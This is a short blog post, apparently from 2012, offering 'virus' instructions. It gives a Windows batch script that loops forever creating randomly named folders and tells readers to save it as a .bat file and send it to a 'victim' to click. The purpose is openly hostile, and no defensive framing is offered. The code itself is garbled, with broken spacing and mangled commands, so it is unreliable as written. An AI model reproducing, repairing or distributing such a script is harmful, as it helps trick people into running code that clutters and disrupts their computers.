"Ini Ceritaku, dan Cerita Teman-Temanku"

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Friday, April 20, 2012

Make a Virus that can make 1000 folders in single click.

1. Open the Notepad application
2. Then Copy and Paste the codes into notepad.

code1: ##########################
@ Echo off :
Top md% random% goto top ##########################
Maybe this code is very familiar, Now am sharing a new version of code. You will be amaze..

code: 2 ##########################
@ Echo off XtreamHackers title 09 color : XtreamHackers md% random%% goto XtreamHackers #########################

3. Now save the file with anyname.bat (e.g, hell.bat or smile.bat)
4. Now send it to victim, when victim clicks on your bat file, he/she will be BOOM :D

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Related : Make a Virus that can make 1000 folders in single click.

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